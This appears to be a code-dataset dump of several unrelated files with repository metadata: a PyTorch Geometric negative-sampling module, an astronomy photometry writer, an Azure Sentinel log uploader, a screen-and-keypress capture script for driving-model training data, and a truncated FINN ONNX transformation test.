NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 2,350
|
2021-09-12T08:32:50.000Z
|
2022-03-31T18:09:36.000Z
|
torch_geometric/utils/negative_sampling.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 588
|
2021-09-12T08:49:08.000Z
|
2022-03-31T21:02:13.000Z
|
torch_geometric/utils/negative_sampling.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 505
|
2021-09-13T13:13:32.000Z
|
2022-03-31T15:54:00.000Z
|
import random
from typing import Optional, Tuple, Union
import numpy as np
import torch
from torch import Tensor
from torch_geometric.utils import coalesce, degree, remove_self_loops
from .num_nodes import maybe_num_nodes
def negative_sampling(edge_index: Tensor,
num_nodes: Optional[Union[int, Tuple[int, int]]] = None,
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False) -> Tensor:
r"""Samples random negative edges of a graph given by :attr:`edge_index`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int or Tuple[int, int], optional): The number of nodes,
*i.e.* :obj:`max_val + 1` of :attr:`edge_index`.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph with shape :obj:`(num_src_nodes, num_dst_nodes)`.
(default: :obj:`None`)
num_neg_samples (int, optional): The (approximate) number of negative
samples to return.
If set to :obj:`None`, will try to return a negative edge for every
positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
"""
assert method in ['sparse', 'dense']
size = num_nodes
bipartite = isinstance(size, (tuple, list))
size = maybe_num_nodes(edge_index) if size is None else size
size = (size, size) if not bipartite else size
force_undirected = False if bipartite else force_undirected
idx, population = edge_index_to_vector(edge_index, size, bipartite,
force_undirected)
if idx.numel() >= population:
return edge_index.new_empty((2, 0))
if num_neg_samples is None:
num_neg_samples = edge_index.size(1)
if force_undirected:
num_neg_samples = num_neg_samples // 2
prob = 1. - idx.numel() / population # Probability to sample a negative.
sample_size = int(1.1 * num_neg_samples / prob) # (Over)-sample size.
neg_idx = None
if method == 'dense':
# The dense version creates a mask of shape `population` to check for
# invalid samples.
mask = idx.new_ones(population, dtype=torch.bool)
mask[idx] = False
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, idx.device)
rnd = rnd[mask[rnd]] # Filter true negatives.
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
mask[neg_idx] = False
else: # 'sparse'
# The sparse version checks for invalid samples via `np.isin`.
idx = idx.to('cpu')
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, device='cpu')
mask = np.isin(rnd, idx)
if neg_idx is not None:
mask |= np.isin(rnd, neg_idx.to('cpu'))
mask = torch.from_numpy(mask).to(torch.bool)
rnd = rnd[~mask].to(edge_index.device)
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
return vector_to_edge_index(neg_idx, size, bipartite, force_undirected)
def batched_negative_sampling(
edge_index: Tensor,
batch: Union[Tensor, Tuple[Tensor, Tensor]],
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False,
) -> Tensor:
r"""Samples random negative edges of multiple graphs given by
:attr:`edge_index` and :attr:`batch`.
Args:
edge_index (LongTensor): The edge indices.
batch (LongTensor or Tuple[LongTensor, LongTensor]): Batch vector
:math:`\mathbf{b} \in {\{ 0, \ldots, B-1\}}^N`, which assigns each
node to a specific example.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph connecting two different node types.
num_neg_samples (int, optional): The number of negative samples to
return. If set to :obj:`None`, will try to return a negative edge
for every positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
"""
if isinstance(batch, Tensor):
src_batch, dst_batch = batch, batch
else:
src_batch, dst_batch = batch[0], batch[1]
split = degree(src_batch[edge_index[0]], dtype=torch.long).tolist()
edge_indices = torch.split(edge_index, split, dim=1)
num_src = degree(src_batch, dtype=torch.long)
cum_src = torch.cat([src_batch.new_zeros(1), num_src.cumsum(0)[:-1]])
if isinstance(batch, Tensor):
num_nodes = num_src.tolist()
cumsum = cum_src
else:
num_dst = degree(dst_batch, dtype=torch.long)
cum_dst = torch.cat([dst_batch.new_zeros(1), num_dst.cumsum(0)[:-1]])
num_nodes = torch.stack([num_src, num_dst], dim=1).tolist()
cumsum = torch.stack([cum_src, cum_dst], dim=1).unsqueeze(-1)
neg_edge_indices = []
for i, edge_index in enumerate(edge_indices):
edge_index = edge_index - cumsum[i]
neg_edge_index = negative_sampling(edge_index, num_nodes[i],
num_neg_samples, method,
force_undirected)
neg_edge_index += cumsum[i]
neg_edge_indices.append(neg_edge_index)
return torch.cat(neg_edge_indices, dim=1)
def structured_negative_sampling(edge_index, num_nodes: Optional[int] = None,
contains_neg_self_loops: bool = True):
r"""Samples a negative edge :obj:`(i,k)` for every positive edge
:obj:`(i,j)` in the graph given by :attr:`edge_index`, and returns it as a
tuple of the form :obj:`(i,j,k)`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: (LongTensor, LongTensor, LongTensor)
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
row, col = edge_index.cpu()
pos_idx = row * num_nodes + col
if not contains_neg_self_loops:
loop_idx = torch.arange(num_nodes) * (num_nodes + 1)
pos_idx = torch.cat([pos_idx, loop_idx], dim=0)
rand = torch.randint(num_nodes, (row.size(0), ), dtype=torch.long)
neg_idx = row * num_nodes + rand
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = mask.nonzero(as_tuple=False).view(-1)
while rest.numel() > 0: # pragma: no cover
tmp = torch.randint(num_nodes, (rest.size(0), ), dtype=torch.long)
rand[rest] = tmp
neg_idx = row[rest] * num_nodes + tmp
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = rest[mask]
return edge_index[0], edge_index[1], rand.to(edge_index.device)
def structured_negative_sampling_feasible(
edge_index: Tensor, num_nodes: Optional[int] = None,
contains_neg_self_loops: bool = True) -> bool:
r"""Returns :obj:`True` if
:meth:`~torch_geometric.utils.structured_negative_sampling` is feasible
on the graph given by :obj:`edge_index`.
:obj:`~torch_geometric.utils.structured_negative_sampling` is infeasible
if at least one node is connected to all other nodes.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: bool
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
max_num_neighbors = num_nodes
edge_index = coalesce(edge_index, num_nodes=num_nodes)
if not contains_neg_self_loops:
edge_index, _ = remove_self_loops(edge_index)
max_num_neighbors -= 1 # Reduce number of valid neighbors
deg = degree(edge_index[0], num_nodes)
# True if there exists no node that is connected to all other nodes.
return bool(torch.all(deg < max_num_neighbors))
###############################################################################
def sample(population: int, k: int, device=None) -> Tensor:
if population <= k:
return torch.arange(population, device=device)
else:
return torch.tensor(random.sample(range(population), k), device=device)
def edge_index_to_vector(
edge_index: Tensor,
size: Tuple[int, int],
bipartite: bool,
force_undirected: bool = False,
) -> Tuple[Tensor, int]:
row, col = edge_index
if bipartite: # No need to account for self-loops.
idx = (row * size[1]).add_(col)
population = size[0] * size[1]
return idx, population
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
# We only operate on the upper triangular matrix:
mask = row < col
row, col = row[mask], col[mask]
offset = torch.arange(1, num_nodes, device=row.device).cumsum(0)[row]
idx = row.mul_(num_nodes).add_(col).sub_(offset)
population = (num_nodes * (num_nodes + 1)) // 2 - num_nodes
return idx, population
else:
assert size[0] == size[1]
num_nodes = size[0]
# We remove self-loops as we do not want to take them into account
# when sampling negative values.
mask = row != col
row, col = row[mask], col[mask]
col[row < col] -= 1
idx = row.mul_(num_nodes - 1).add_(col)
population = num_nodes * num_nodes - num_nodes
return idx, population
def vector_to_edge_index(idx: Tensor, size: Tuple[int, int], bipartite: bool,
force_undirected: bool = False) -> Tensor:
if bipartite: # No need to account for self-loops.
row = idx.div(size[1], rounding_mode='floor')
col = idx % size[1]
return torch.stack([row, col], dim=0)
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
offset = torch.arange(1, num_nodes, device=idx.device).cumsum(0)
end = torch.arange(num_nodes, num_nodes * num_nodes, num_nodes,
device=idx.device)
row = torch.bucketize(idx, end.sub_(offset), right=True)
col = offset[row].add_(idx) % num_nodes
return torch.stack([torch.cat([row, col]), torch.cat([col, row])], 0)
else:
assert size[0] == size[1]
num_nodes = size[0]
row = idx.div(num_nodes - 1, rounding_mode='floor')
col = idx % (num_nodes - 1)
col[row <= col] += 1
return torch.stack([row, col], dim=0)
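# A minimal usage sketch (not part of the original module); the toy graph below is
# illustrative only and the block runs only when this file is executed as a script.
if __name__ == "__main__":
    # 4-node cycle graph: edges 0->1, 1->2, 2->3, 3->0.
    demo_edge_index = torch.tensor([[0, 1, 2, 3], [1, 2, 3, 0]])
    # Sample (approximately) one negative edge per positive edge.
    demo_neg = negative_sampling(demo_edge_index, num_nodes=4, method='dense')
    print(demo_neg)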
| 39.395498
| 79
| 0.614675
| 1,676
| 12,252
| 4.321599
| 0.137232
| 0.05633
| 0.025128
| 0.017672
| 0.54563
| 0.493856
| 0.414331
| 0.387409
| 0.379953
| 0.350683
| 0
| 0.00768
| 0.266732
| 12,252
| 310
| 80
| 39.522581
| 0.798531
| 0.337251
| 0
| 0.3125
| 0
| 0
| 0.006075
| 0
| 0
| 0
| 0
| 0
| 0.028409
| 1
| 0.039773
| false
| 0
| 0.039773
| 0
| 0.153409
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e37ada66e51ab9afb000b29227a5b5f48e9d09
| 6,230
|
py
|
Python
|
p_io.py
|
JeremyBuchanan/psf-photometry-pipeline
|
864818dc8dd946a6e4d8dde1667bf948b769bb39
|
[
"MIT"
] | null | null | null |
p_io.py
|
JeremyBuchanan/psf-photometry-pipeline
|
864818dc8dd946a6e4d8dde1667bf948b769bb39
|
[
"MIT"
] | null | null | null |
p_io.py
|
JeremyBuchanan/psf-photometry-pipeline
|
864818dc8dd946a6e4d8dde1667bf948b769bb39
|
[
"MIT"
] | null | null | null |
import astropy.io.fits as fits
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import obj_data as od
import saphires as saph
from astropy.time import Time
from astropy.visualization import ZScaleInterval, SqrtStretch, ImageNormalize, simple_norm
from matplotlib.backends.backend_pdf import PdfPages
ra = od.ra
dec = od.dec
pmra = od.pmra
pmdec = od.pmdec
plx = od.plx
epoch = od.epoch
matplotlib.rcParams.update({'font.size': 12})
def write_fits(fn, data, im_headers, wcs_header):
'''
Writes a new fits file including the image data and an
updated header for the new image
Parameters
----------
fn: string
The desired file name of the new fits file
data: array-like
Contains all the image data
Returns
-------
avg_airmass: float
the amount of atmosphere obscuring the target, found in image header. Here
the airmass for all images is averaged
bjd: float
Barycentric Julian Date, found in the image header
header: Header
'''
for keys in wcs_header:
if keys not in ['HISTORY', 'COMMENT']:
im_headers[0][keys] = wcs_header[keys]
airmass = []
for i in im_headers:
airmass.append(i['AIRMASS'])
avg_airmass = np.mean(airmass)
im_headers[0]['AIRMASS'] = avg_airmass
jd_middle = np.zeros(len(im_headers))
for i in range(len(im_headers)):
jd_middle[i] = Time(im_headers[i]['DATE-OBS'], format='isot').jd
exptime = im_headers[i]['EXPTIME']
jd_middle[i] = jd_middle[i] + (exptime/2.0)/3600.0/24.0
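# Worked example (illustrative numbers): a 120 s exposure whose DATE-OBS converts to
# JD 2459000.5 gets a mid-exposure time of 2459000.5 + 60/86400 ≈ 2459000.500694.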
isot_date_obs = Time(np.mean(jd_middle), format='jd').isot
tele = im_headers[0]['SITEID']
brv,bjd,bvcorr = saph.utils.brvc(isot_date_obs,0.0,tele,ra=ra,dec=dec,epoch=epoch, pmra=pmra, pmdec=pmdec, px=plx)
im_headers[0]['BJD'] = bjd[0]
header = im_headers[0]
hdu_p = fits.PrimaryHDU(data=data, header=header)
hdu = fits.HDUList([hdu_p])
hdu.writeto(fn)
return avg_airmass, bjd, header
def write_pdf(name, images, model=None, final_stars=None, residual_stars=None, fluxes=None, plot_res=None):
pp = PdfPages(name)
for i in range(len(images)):
fig, ax = plt.subplots(1, figsize=(10, 10))
norm = ImageNormalize(images[i], interval=ZScaleInterval(), stretch=SqrtStretch())
im = ax.imshow(images[i], norm=norm)
plt.colorbar(im)
plt.tight_layout()
pp.savefig()
plt.close()
if model is not None:
fig, ax = plt.subplots(1, figsize=(10, 10))
psf = ax.imshow(model)
plt.colorbar(psf)
ax.set_title('PSF Model')
plt.tight_layout()
pp.savefig()
plt.close()
if final_stars is not None:
if plot_res == 'y':
nrows = len(final_stars)
ncols = 2
fig, ax = plt.subplots(nrows=nrows, ncols=ncols, figsize=(10, 800), squeeze=True)
ax = ax.ravel()
index = 0
for i in range(0, nrows*ncols, 2):
norm = simple_norm(final_stars[index],'log')
norm2 = simple_norm(residual_stars[index], 'linear')
im = ax[i].imshow(final_stars[index], norm=norm, origin='lower', cmap='viridis', interpolation='none')
fig.colorbar(im, ax = ax[i])
ax[i].set_title(np.str(fluxes[index]))
im_r = ax[i+1].imshow(residual_stars[index], norm=norm2, origin='lower', cmap='viridis', interpolation='none')
fig.colorbar(im_r, ax = ax[i+1])
index = index + 1
plt.tight_layout()
pp.savefig()
plt.close()
pp.close()
def write_csv(name, im_name, bjd, filt, airmass, results, sky):
f = open(name, 'w')
f.write('NAME, ID, BJD, FLUX, FLUX ERROR, MAG, MAG ERROR, FILTER, X POSITION, Y POSITION, AIRMASS, RA, DEC\n')
for i in range(sky.size):
if results['flux_fit'][i] > 0:
star_id = results['id'][i]
flux = results['flux_fit'][i]
fluxerr = results['flux_unc'][i]
mag = -2.5*np.log10(flux)
magerr = (1.08574*fluxerr)/(flux)
x_pos = results['x_fit'][i]
y_pos = results['y_fit'][i]
ra = sky[i].ra.degree
dec = sky[i].dec.degree
f.write(im_name+','+np.str(i)+','+np.str(bjd)+','+np.str(flux)+','+np.str(fluxerr)+','+np.str(mag)+','+np.str(magerr)
+','+filt+','+np.str(x_pos)+','+np.str(y_pos)+','+str(airmass)+','+np.str(ra)+','+np.str(dec)+'\n')
f.close()
def write_txt(name, sources, stars_tbl, fwhm, results=None, t0=None,t1=None,t2=None,t3=None,t4=None,t5=None):
'''
Short text file with diagnostic info about each image set, specifically
for a successful run of the image set
Parameters
----------
name: string
name of the saved file
sources: Table
tabulated info about all the stars found on the image
stars_tbl: Table
tabulated info about all the stars used to form a psf
results: Table
tabulated info about all the stars found with the photometry routine
'''
f = open(name, 'w')
f.write('Number of stars in sources: '+np.str(len(sources))+'\nNumber of stars in stars_tbl: '+np.str(len(stars_tbl))
+'\nNumbers of stars in results: '+np.str(len(results))+'\nMin, Max, Median peaks in sources: '
+np.str(np.min(sources['peak']))+', '+np.str(np.max(sources['peak']))+', '+np.str(np.median(sources['peak']))
+'\nMin, Max, Median fluxes in results: '+np.str(np.min(results['flux_fit']))+', '+np.str(np.max(results['flux_fit']))+', '
+np.str(np.median(results['flux_fit']))+'\nFWHM: '+np.str(fwhm)+'\n')
if t5:
t_1 = t1-t0
t_2 = t2-t1
t_3 = t3-t2
t_4 = t4-t3
t_5 = t5-t4
t_f = t5-t0
f.write('Time to combine images: '+np.str(t_1)+'\nTime to find stars: '+np.str(t_2)+'\nTime to build psf: '
+np.str(t_3)+'\nTime to run photometry: '+np.str(t_4)+'\nTime to get wcs: '+np.str(t_5)+'\nTotal time: '
+np.str(t_f)+'\n')
f.close()
| 40.193548
| 135
| 0.586035
| 911
| 6,230
| 3.91438
| 0.255763
| 0.037858
| 0.011778
| 0.012339
| 0.142176
| 0.124229
| 0.103477
| 0.08525
| 0.029164
| 0
| 0
| 0.018333
| 0.264526
| 6,230
| 154
| 136
| 40.454545
| 0.75993
| 0.154414
| 0
| 0.133929
| 0
| 0.008929
| 0.120226
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.080357
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e53510234906afd7570dd7318d1a436abfb43e
| 2,752
|
py
|
Python
|
Solutions/TenableIO/Data Connectors/azure_sentinel.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 2,227
|
2019-02-25T09:34:46.000Z
|
2022-03-31T21:30:59.000Z
|
Solutions/TenableIO/Data Connectors/azure_sentinel.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 1,728
|
2019-02-25T17:18:16.000Z
|
2022-03-31T23:49:18.000Z
|
Solutions/TenableIO/Data Connectors/azure_sentinel.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 1,624
|
2019-02-28T16:17:38.000Z
|
2022-03-31T18:00:02.000Z
|
import re
import base64
import hmac
import hashlib
import logging
import requests
from datetime import datetime
class AzureSentinel:
def __init__(self, workspace_id, workspace_key, log_type, log_analytics_url=''):
self._workspace_id = workspace_id
self._workspace_key = workspace_key
self._log_type = log_type
if ((log_analytics_url in (None, '') or str(log_analytics_url).isspace())):
log_analytics_url = 'https://' + self._workspace_id + '.ods.opinsights.azure.com'
pattern = r"https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$"
if not re.match(pattern, str(log_analytics_url)):
raise Exception("Invalid Log Analytics Uri.")
self._log_analytics_url = log_analytics_url
def build_signature(self, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + \
str(content_length) + "\n" + content_type + \
"\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(self._workspace_key)
encoded_hash = base64.b64encode(hmac.new(
decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(
self._workspace_id, encoded_hash)
return authorization
def post_data(self, body):
logging.info('constructing post to send to Azure Sentinel.')
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
logging.info('build signature.')
signature = self.build_signature(
rfc1123date, content_length, method, content_type, resource)
logging.info('signature built.')
uri = self._log_analytics_url + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': self._log_type,
'x-ms-date': rfc1123date
}
logging.info('sending post to Azure Sentinel.')
response = requests.post(uri, data=body, headers=headers)
logging.info(response.status_code)
if (response.status_code >= 200 and response.status_code <= 299):
return response.status_code
else:
logging.warn("Events are not processed into Azure. Response code: {}".format(
response.status_code))
raise Exception(
f'Sending to Azure Sentinel failed with status code {response.status_code}')
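# A minimal usage sketch (workspace id, key and log type below are placeholders, not real values):
#
#   import json
#   sentinel = AzureSentinel("<workspace-id>", "<base64-shared-key>", "MyLog")
#   sentinel.post_data(json.dumps([{"event": "example"}]))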
| 42.338462
| 100
| 0.630087
| 324
| 2,752
| 5.123457
| 0.364198
| 0.06506
| 0.072289
| 0.028916
| 0.072289
| 0.045783
| 0
| 0
| 0
| 0
| 0
| 0.019436
| 0.25218
| 2,752
| 64
| 101
| 43
| 0.787172
| 0
| 0
| 0
| 0
| 0
| 0.18423
| 0.046512
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051724
| false
| 0
| 0.12069
| 0
| 0.224138
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e59ef3909991b68e7bb0525872e77256366019
| 3,553
|
py
|
Python
|
MiniProject.py
|
siddharths067/CNN-Based-Agent-Modelling-for-Humanlike-Driving-Simulaion
|
42d79fc262d60ecc9eebbe0e77a1576a04979501
|
[
"Apache-2.0"
] | null | null | null |
MiniProject.py
|
siddharths067/CNN-Based-Agent-Modelling-for-Humanlike-Driving-Simulaion
|
42d79fc262d60ecc9eebbe0e77a1576a04979501
|
[
"Apache-2.0"
] | null | null | null |
MiniProject.py
|
siddharths067/CNN-Based-Agent-Modelling-for-Humanlike-Driving-Simulaion
|
42d79fc262d60ecc9eebbe0e77a1576a04979501
|
[
"Apache-2.0"
] | null | null | null |
from tkinter import *
from PIL import ImageGrab
import numpy as np
import cv2
import time
import pyautogui as pg
import DirectInputRoutines as DIR
from LogKey import key_check
last_time = time.time()
one_hot = [0, 0, 0, 0, 0, 0]
hash_dict = {'w':0, 's':1, 'a':2, 'd':3, 'c':4, 'v':5}
X = []
y = []
def auto_canny(image, sigma=0.33):
# compute the median of the single channel pixel intensities
v = np.median(image)
# apply automatic Canny edge detection using the computed median
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edged = cv2.Canny(image, lower, upper)
# return the edged image
return edged
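# Worked example (approximate, subject to float truncation): with a median pixel
# value v = 100 and the default sigma = 0.33, the thresholds become
# lower = int(max(0, 0.67 * 100)) ≈ 67 and upper = int(min(255, 1.33 * 100)) ≈ 133.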
def process_img(original_image):
processed_img = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)
processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
#processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
vertices = np.array([[10,500],[10,300],[300,200],[500,200],[800,300],[800,500],
], np.int32)
processed_img = cv2.GaussianBlur(processed_img,(5,5),0)
processed_img = roi(processed_img, [vertices])
# more info: http://docs.opencv.org/3.0-beta/doc/py_tutorials/py_imgproc/py_houghlines/py_houghlines.html
# edges rho theta thresh # min length, max gap:
#lines = cv2.HoughLinesP(processed_img, 1, np.pi/180, 180, 20, 15)
#draw_lines(processed_img,lines)
return processed_img
def roi(img, vertices):
#blank mask:
mask = np.zeros_like(img)
# fill the mask
cv2.fillPoly(mask, vertices, 255)
# now only show the area that is the mask
masked = cv2.bitwise_and(img, mask)
return masked
def draw_lines(img,lines):
for line in lines:
coords = line[0]
cv2.line(img, (coords[0], coords[1]), (coords[2], coords[3]), [255,255,255], 3)
def change_tab():
pg.hotkey("alt","tab")
def send_key(e):
hash = {"w":DIR.W, "a":DIR.A, "s":DIR.S, "d":DIR.D}
return hash[e.keysym]
def keyup(e):
if(e.keysym == "Alt_L" or e.keysym == "Tab"):
return
#print('down', e.keysym)
change_tab()
DIR.ReleaseKey(send_key(e))
change_tab()
global last_time
one_hot[hash_dict[e.keysym]] = 0
temp = list(one_hot)
printscreen = np.array(ImageGrab.grab(bbox=(0,40,800,640)))
printscreen = process_img(printscreen)
print('loop took {} seconds'.format(time.time()-last_time))
print([printscreen, temp])
last_time = time.time()
X.append(printscreen)
y.append(temp)
#cv2.imshow("image", printscreen)
def keydown(e):
#print('up', e.keysym)
if(e.keysym == "Alt_L" or e.keysym == "Tab"):
return
change_tab()
DIR.ReleaseKey(send_key(e))
change_tab()
global last_time
one_hot[hash_dict[e.keysym]] = 1
temp = list(one_hot)
printscreen = np.array(ImageGrab.grab(bbox=(0,40,800,680)))
printscreen = process_img(printscreen)
print('loop took {} seconds'.format(time.time()-last_time))
print([printscreen,temp])
last_time = time.time()
X.append(printscreen)
y.append(temp)
root = Tk()
frame = Frame(root, width=100, height=100)
frame.bind("<KeyPress>", keydown)
frame.bind("<KeyRelease>", keyup)
frame.pack()
frame.focus_set()
root.mainloop()
np.save("X.npy", X)
np.save("y.npy", y)
| 32.3
| 110
| 0.627357
| 517
| 3,553
| 4.203095
| 0.336557
| 0.077312
| 0.034515
| 0.022089
| 0.35803
| 0.355269
| 0.355269
| 0.355269
| 0.355269
| 0.355269
| 0
| 0.057049
| 0.225443
| 3,553
| 110
| 111
| 32.3
| 0.732558
| 0.187447
| 0
| 0.349398
| 0
| 0
| 0.03764
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096386
| false
| 0
| 0.096386
| 0
| 0.26506
| 0.120482
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e76b8b07e06048ecf1a15c72134fecf5c97346
| 3,227
|
py
|
Python
|
tests/transformation/streamline/test_move_identical_op_past_join_op.py
|
mmrahorovic/finn
|
d1cc9cf94f1c33354cc169c5a6517314d0e94e3b
|
[
"BSD-3-Clause"
] | 109
|
2018-07-02T13:52:26.000Z
|
2019-09-23T02:33:24.000Z
|
tests/transformation/streamline/test_move_identical_op_past_join_op.py
|
mmrahorovic/finn
|
d1cc9cf94f1c33354cc169c5a6517314d0e94e3b
|
[
"BSD-3-Clause"
] | 36
|
2018-08-15T19:05:09.000Z
|
2019-07-14T17:51:20.000Z
|
tests/transformation/streamline/test_move_identical_op_past_join_op.py
|
mmrahorovic/finn
|
d1cc9cf94f1c33354cc169c5a6517314d0e94e3b
|
[
"BSD-3-Clause"
] | 28
|
2018-08-23T12:46:06.000Z
|
2019-09-08T14:19:09.000Z
|
import pytest
from onnx import TensorProto
from onnx import helper as oh
import finn.core.onnx_exec as oxe
from finn.core.modelwrapper import ModelWrapper
from finn.transformation.streamline.reorder import MoveTransposePastJoinAdd
from finn.util.basic import gen_finn_dt_tensor
def create_model(perm):
if perm == [0, 3, 1, 2]:
in_shape = [1, 128, 1, 256]
out_shape = [1, 256, 128, 1]
if perm == [0, 2, 3, 1]:
in_shape = [1, 256, 128, 1]
out_shape = [1, 128, 1, 256]
Transpose1_node = oh.make_node(
"Transpose", inputs=["in_transpose1"], outputs=["out_transpose1"], perm=perm
)
Transpose2_node = oh.make_node(
"Transpose", inputs=["in_transpose2"], outputs=["out_transpose2"], perm=perm
)
Join1_node = oh.make_node(
"Add", inputs=["out_transpose1", "out_transpose2"], outputs=["out_join1"]
)
in_transpose1 = oh.make_tensor_value_info(
"in_transpose1", TensorProto.FLOAT, in_shape
)
in_transpose2 = oh.make_tensor_value_info(
"in_transpose2", TensorProto.FLOAT, in_shape
)
out_transpose1 = oh.make_tensor_value_info(
"out_transpose1", TensorProto.FLOAT, out_shape
)
out_transpose2 = oh.make_tensor_value_info(
"out_transpose2", TensorProto.FLOAT, out_shape
)
out_join1 = oh.make_tensor_value_info("out_join1", TensorProto.FLOAT, out_shape)
graph = oh.make_graph(
nodes=[Transpose1_node, Transpose2_node, Join1_node],
name="test_graph",
inputs=[in_transpose1, in_transpose2],
outputs=[out_join1],
value_info=[
out_transpose1,
out_transpose2,
],
)
onnx_model = oh.make_model(graph, producer_name="test_model")
model = ModelWrapper(onnx_model)
return model
# Permutation of transpose node
@pytest.mark.parametrize("perm", [[0, 3, 1, 2], [0, 2, 3, 1]])
def test_move_identical_op_past_join_op(perm):
model = create_model(perm)
# Create input data
input0_tensor_name = model.graph.input[0].name
input1_tensor_name = model.graph.input[1].name
# Note: it is assumed that both tensors have the same shape and data type
input_shape = model.get_tensor_shape(input0_tensor_name)
input_dtype = model.get_tensor_datatype(input0_tensor_name)
input_val = gen_finn_dt_tensor(input_dtype, input_shape)
input_dict = {}
input_dict[input0_tensor_name] = input_val
input_dict[input1_tensor_name] = input_val
model_transformed = model.transform(MoveTransposePastJoinAdd())
assert oxe.compare_execution(model, model_transformed, input_dict)
# Check if order changed
node0_input0_model = model.find_consumers(model.graph.input[0].name)[0].op_type
node1_input1_model = model.find_consumers(model.graph.input[1].name)[0].op_type
